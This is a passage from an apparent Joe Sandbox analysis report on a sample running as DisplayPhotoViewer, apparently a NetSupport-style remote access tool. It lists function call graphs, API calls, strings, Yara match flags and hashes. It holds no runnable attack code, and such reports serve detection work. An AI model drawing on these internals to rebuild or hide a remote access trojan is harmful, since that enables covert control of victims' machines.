                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$AtomGlobal_memset
                                                                                                    • String ID: NSMBlankWnd$dwmapi.dll
                                                                                                    • API String ID: 1486806061-3254748277
                                                                                                    • Opcode ID: e5e71ec4e7030411be38a273ea76bc549a8f1fba87bc9a173fb9f5573e74137a
                                                                                                    • Instruction ID: 3806c2d577549acdd3d357e76783547b80994e82cc6b2600800a28ee96a99825
                                                                                                    • Opcode Fuzzy Hash: e5e71ec4e7030411be38a273ea76bc549a8f1fba87bc9a173fb9f5573e74137a
                                                                                                    • Instruction Fuzzy Hash: AA011BB5A05A549FD321CF69D840BDAFBE8FB5A720F00462FE86AD3700DB706501CB51
                                                                                                    Function 10702B80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(10715B58), ref: 10702B97
                                                                                                    • wsprintfA.USER32 ref: 10702BC6
                                                                                                    • CreateEventA.KERNEL32(?,?,?,?), ref: 10702BE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateEventIncrementInterlockedwsprintf
                                                                                                    • String ID: %s_L%d_%x
                                                                                                    • API String ID: 608154824-3441399356
                                                                                                    • Opcode ID: e11d0b65dd49d94373b60c2733f6c9292192ee08cafd4bdc4cfde9b2804ef49b
                                                                                                    • Instruction ID: 412f0433949f51ee11ace6e16096771bb88ef87fd4ce0d7511e0046e7a8ce87e
                                                                                                    • Opcode Fuzzy Hash: e11d0b65dd49d94373b60c2733f6c9292192ee08cafd4bdc4cfde9b2804ef49b
                                                                                                    • Instruction Fuzzy Hash: 43F03CB6600118ABDB10DF68DC89EEB77BCEB89341F004155FE08D3280E675E955CBA5
                                                                                                    Function 1103D890 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1103D820: IsWindow.USER32(00000000), ref: 1103D836
                                                                                                      • Part of subcall function 1103D820: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D84C
                                                                                                      • Part of subcall function 1103D820: IsWindow.USER32(00000000), ref: 1103D854
                                                                                                      • Part of subcall function 1103D820: Sleep.KERNEL32(00000014), ref: 1103D867
                                                                                                      • Part of subcall function 1103D820: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D877
                                                                                                      • Part of subcall function 1103D820: IsWindow.USER32(00000000), ref: 1103D87F
                                                                                                    • IsWindow.USER32(00000000), ref: 1103D8BA
                                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103D8CD
                                                                                                    Strings
                                                                                                    • PCIVideoSlave32, xrefs: 1103D8D8
                                                                                                    • DoMMData - could not find %s window, xrefs: 1103D8DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Find$MessageSendSleep
                                                                                                    • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                                    • API String ID: 1010850397-3146847729
                                                                                                    • Opcode ID: 59d1aa3e7580583fe14735909c83a67f39afb1ebbd8289926530bb3557182d85
                                                                                                    • Instruction ID: 794ad1d0e3b69f8aaa6c071038eb11c64f103741b10cc09acd9ab3006e1afefb
                                                                                                    • Opcode Fuzzy Hash: 59d1aa3e7580583fe14735909c83a67f39afb1ebbd8289926530bb3557182d85
                                                                                                    • Instruction Fuzzy Hash: D2F02771E5021877E710AB54AC0ABDDB7A8DF0131AF004099FC08662C0E7B1261047D6
                                                                                                    Function 110A7660 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,LsaNtStatusToWinError,?,110A7D0E,00000000,218EC38C,00000000,?,00000000), ref: 110A766D
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 110A7674
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: Advapi32.dll$LsaNtStatusToWinError
                                                                                                    • API String ID: 1646373207-2970311197
                                                                                                    • Opcode ID: ae664d36eae72a938c56288cceb2c80793f5d08de1e41e2230961d7ef98cbca0
                                                                                                    • Instruction ID: 2accae55ca2b5792729f0a1934953a71f409c38dbf1f797fdf7c587213e78e09
                                                                                                    • Opcode Fuzzy Hash: ae664d36eae72a938c56288cceb2c80793f5d08de1e41e2230961d7ef98cbca0
                                                                                                    • Instruction Fuzzy Hash: 8BD0A77235410C6BDF04DFF9FC84E5D7B9CAB84285B008024F81EC3040D932D100C7A1
                                                                                                    Function 1070F008 Relevance: 6.5, APIs: 5, Instructions: 278COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb13045082f433e4fbec704f34339cdd38acbf10bd18cac104a89994f8584751
                                                                                                    • Instruction ID: fc1c1e27e9268ba457460c1e0a47d9a36352585bb26c5b3cb28cc44438fa96f6
                                                                                                    • Opcode Fuzzy Hash: bb13045082f433e4fbec704f34339cdd38acbf10bd18cac104a89994f8584751
                                                                                                    • Instruction Fuzzy Hash: E7911575D00259EFCB119B68DC84ACEBBF8EB4A7A0F214316F854F6598E7319D40CBA4
                                                                                                    Function 107070A7 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • HeapAlloc.KERNEL32(00000000,00002020,107127F0,107127F0,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000), ref: 107070C8
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000), ref: 107070EC
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000), ref: 10707106
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000,?), ref: 107071C7
                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000,?,00000000), ref: 107071DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual$FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 714016831-0
                                                                                                    • Opcode ID: 86ac732e2cef7a4f41e4384cd78238bc16a240184a4ca22a51a8563f44cb6df4
                                                                                                    • Instruction ID: feb03214d5741fced040bc47ab8b5ae6cf5826734a76310682f2babfde8836ec
                                                                                                    • Opcode Fuzzy Hash: 86ac732e2cef7a4f41e4384cd78238bc16a240184a4ca22a51a8563f44cb6df4
                                                                                                    • Instruction Fuzzy Hash: 813127B1A407169FD3218F24CC84F12B7E0FB8A794F118329F265973D4E7B0A855DB98
                                                                                                    Function 10703590 Relevance: 6.3, APIs: 5, Instructions: 45sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40,0000000D,10722A80,00000000,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000), ref: 107035C8
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 107035DF
                                                                                                    • Sleep.KERNEL32(0000000A,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 107035EB
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 107035F6
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 1070360D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2348874005-0
                                                                                                    • Opcode ID: 27e3f2ba4daa42d75924260dfed5ba8ced7b1a2898e6ee1a0775e7e51bc164c6
                                                                                                    • Instruction ID: 5c0b0e6237950cfc863c26e0e1865889bee6ac4f488e388052f5148adeadb31d
                                                                                                    • Opcode Fuzzy Hash: 27e3f2ba4daa42d75924260dfed5ba8ced7b1a2898e6ee1a0775e7e51bc164c6
                                                                                                    • Instruction Fuzzy Hash: 1501713A304350ABCF519FA4DC88A977BA9FF4DA50B08C409F59A87391D771D440C7A9
                                                                                                    Function 1070C247 Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 1070C2C1
                                                                                                    • GetLastError.KERNEL32 ref: 1070C2CB
                                                                                                    • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 1070C391
                                                                                                    • GetLastError.KERNEL32 ref: 1070C39B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1948546556-0
                                                                                                    • Opcode ID: b678442f16a60e6423508f4e3f6d60bb23680cc84a5c09bfedaed9ca523edd31
                                                                                                    • Instruction ID: 8a0e605970556834e0796a0b69968d56a2b52bf72ac9a60869b94dd26ea6d076
                                                                                                    • Opcode Fuzzy Hash: b678442f16a60e6423508f4e3f6d60bb23680cc84a5c09bfedaed9ca523edd31
                                                                                                    • Instruction Fuzzy Hash: A651C134A1438DDFDB118F98C880B99BBF4FF07344F218699E8959B29AC370D946CB12
                                                                                                    Function 11063910 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,00000000,00002710,00000001,11025830,218EC38C,00000000,00002710,?,?,00000000,11177228,000000FF,?,110279AE), ref: 110639BA
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11063A80
                                                                                                      • Part of subcall function 111075F0: InterlockedDecrement.KERNEL32(?), ref: 111075F8
                                                                                                    Strings
                                                                                                    • EnumConn error, idata=%x, xrefs: 11063AF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DecrementEnterInterlockedLeave
                                                                                                    • String ID: EnumConn error, idata=%x
                                                                                                    • API String ID: 1807080765-705201588
                                                                                                    • Opcode ID: 3a508617cd74928a7c96c9a6c438ec5cdf22aebab3ed76894de4212ceeedf64a
                                                                                                    • Instruction ID: 17f3c0e61b801fee071ccd4bb8b63526ea1f2ab35179e33c299b0af982ef43b0
                                                                                                    • Opcode Fuzzy Hash: 3a508617cd74928a7c96c9a6c438ec5cdf22aebab3ed76894de4212ceeedf64a
                                                                                                    • Instruction Fuzzy Hash: C6519D75E087468FDB25CF55C480BAAF7F9FB45318F1046ADC85A9BA81D731A841CB90
                                                                                                    Function 11151680 Relevance: 6.2, APIs: 4, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 11151786
                                                                                                    • SysStringByteLen.OLEAUT32(?), ref: 11151791
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteChangeStringTypeVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 4048352505-0
                                                                                                    • Opcode ID: 5cf9ba5d4f1cef86f27e16426fd535be8c5cbc6b65dedc4a04e4e4a76ccfe586
                                                                                                    • Instruction ID: 8c2302e4f832c5313c0500b49527ef0deb6e400fdf8ff0abdd79b75311441025
                                                                                                    • Opcode Fuzzy Hash: 5cf9ba5d4f1cef86f27e16426fd535be8c5cbc6b65dedc4a04e4e4a76ccfe586
                                                                                                    • Instruction Fuzzy Hash: B2418F79600605AFDB92DF9CCC80EAFBBB9EFC6704F108615F925DB244D670A941CBA0
                                                                                                    Function 110E53D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32(00000057,0BA6EEE0,00000001,00000000,00000000,75C05440,?,00000000,11130F55), ref: 110E5524
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • InitPlugin(0x%08x, %d), xrefs: 110E5402
                                                                                                    • NSSClientPlugin.cpp, xrefs: 110E544B
                                                                                                    • m_plugin_table[pluginid] == NULL, xrefs: 110E5450
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                                                                    • String ID: InitPlugin(0x%08x, %d)$NSSClientPlugin.cpp$m_plugin_table[pluginid] == NULL
                                                                                                    • API String ID: 73808336-146751015
                                                                                                    • Opcode ID: afa4c191b4a11e46e575e84e228cd875ee70c10cd971d90b88d8bbb483e6f22e
                                                                                                    • Instruction ID: fa2e4c6332bb9c1984046545c0499ba7b14bebca60f4c118724344c3fe6b1557
                                                                                                    • Opcode Fuzzy Hash: afa4c191b4a11e46e575e84e228cd875ee70c10cd971d90b88d8bbb483e6f22e
                                                                                                    • Instruction Fuzzy Hash: BA412A79E06206AFEB00CBA6DC44B9EBBF89F54758F004569EC01D7380FB71AA00C7A1
                                                                                                    Function 1070C057 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,1070C70A,00000000,00001000), ref: 1070C11E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 11fc83bf233d502a807eb2f0ab1b972baeb05de409a6ed9833967058b92f2189
                                                                                                    • Instruction ID: 14ac855d441a17daf4156a7ff5e6e6a20f998f52faaa3ed227c84ffda7febd2a
                                                                                                    • Opcode Fuzzy Hash: 11fc83bf233d502a807eb2f0ab1b972baeb05de409a6ed9833967058b92f2189
                                                                                                    • Instruction Fuzzy Hash: DA514CB1A0025CEFDB02CF68CC85A9D7BF4FF46390F2186A5E8159B25AD770DA40DB60
                                                                                                    Function 1105D260 Relevance: 6.1, APIs: 4, Instructions: 131registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105D29C
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105D2F4
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 1105D3E3
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1105D3F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
